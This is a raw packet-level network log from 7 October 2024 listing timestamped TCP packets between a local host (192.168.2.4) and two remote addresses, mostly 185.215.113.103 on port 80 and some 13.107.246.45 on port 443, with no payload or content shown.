                                                                                                                                      Oct 7, 2024 03:23:19.610713005 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610717058 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610727072 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610739946 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610745907 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610752106 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610757113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610774994 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610788107 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610793114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610827923 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610832930 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610913038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610918999 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610924006 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610934973 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610944986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610955000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610963106 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610963106 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610980034 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.610984087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.610994101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611004114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611020088 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611027002 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611040115 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611581087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611589909 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611594915 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611612082 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611623049 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611630917 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611634016 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611644983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611665010 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611677885 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611689091 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611715078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611746073 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611762047 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611792088 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611927032 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611937046 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611947060 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611958981 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611968994 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611974955 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.611979961 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611990929 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.611991882 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612003088 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612004042 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612015009 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612024069 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612025976 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612035036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612046003 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612049103 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612062931 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612081051 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612128973 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612139940 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612149000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612159967 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612164974 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612170935 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612171888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612180948 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612188101 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612191916 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612204075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612205029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612211943 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612216949 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612236023 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612255096 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612281084 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612291098 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612301111 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612309933 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612315893 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612338066 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612339973 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612345934 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.612358093 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.612385988 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.616178989 CEST4434988813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.617005110 CEST4434988913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.628285885 CEST4434989013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.643476009 CEST4434989113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651043892 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651066065 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651082039 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651096106 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651108980 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651165962 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651177883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651189089 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651200056 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651221037 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651231050 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651242971 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651252031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651252031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651252031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651252031 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651253939 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651269913 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651274920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651287079 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651297092 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651302099 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651308060 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651319981 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651325941 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651345968 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651349068 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651362896 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651374102 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651380062 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651405096 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651408911 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651420116 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651432037 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651433945 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651441097 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.651460886 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.651487112 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.658071041 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658116102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658128023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658174992 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658179998 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.658186913 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658199072 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658210993 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.658216953 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.658240080 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.658263922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.662134886 CEST49888443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.665134907 CEST49889443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.665608883 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670428038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670439005 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670449972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670485973 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670499086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670507908 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670510054 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670542955 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670552969 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670582056 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670593023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670603991 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670615911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670625925 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670627117 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670625925 CEST49891443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.670639992 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670651913 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670653105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670663118 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670670986 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670670986 CEST4434989113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.670690060 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.670717955 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.671165943 CEST49891443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.671170950 CEST4434989113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.671586990 CEST49890443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.671636105 CEST4434989013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.674738884 CEST49890443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.674751997 CEST4434989013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.677118063 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.677140951 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.677153111 CEST49887443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.677159071 CEST4434988713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.686024904 CEST49888443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.686031103 CEST4434988813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.686297894 CEST49889443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.686311960 CEST4434988913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.686614037 CEST49888443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.686619997 CEST4434988813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.686713934 CEST49889443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.686723948 CEST4434988913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.693835974 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.693864107 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.693978071 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.694128036 CEST49894443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:19.694138050 CEST4434989413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698714972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698736906 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698782921 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.698849916 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698862076 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698873043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698884964 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698890924 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.698909044 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.698915005 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698925972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.698932886 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699018002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699028015 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699029922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699040890 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699052095 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699070930 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699073076 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699084997 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699095011 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699105978 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699119091 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699120998 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699177980 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699197054 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699208021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699223995 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699229002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699239016 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699251890 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699259043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699276924 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699285984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699289083 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699305058 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699327946 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699331045 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699343920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699354887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699367046 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699388027 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699394941 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699462891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699474096 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699485064 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699496984 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.699503899 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699518919 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.699541092 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700095892 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700107098 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700119972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700143099 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700154066 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700175047 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700177908 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700189114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700195074 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700203896 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700215101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700282097 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700293064 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700311899 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700314045 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700328112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700333118 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700341940 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700352907 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700354099 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700366020 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700377941 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700378895 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700390100 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700404882 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700421095 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700443029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700443983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700455904 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700465918 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700479031 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700479984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700491905 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700491905 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700503111 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700512886 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700524092 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700551987 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700579882 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700592041 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700604916 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700629950 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700654984 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700659990 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700671911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700684071 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700695038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700709105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700717926 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700722933 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700728893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700745106 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700753927 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700777054 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700783968 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700795889 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700800896 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700829029 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.700841904 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.700843096 CEST8049879185.215.113.103192.168.2.4
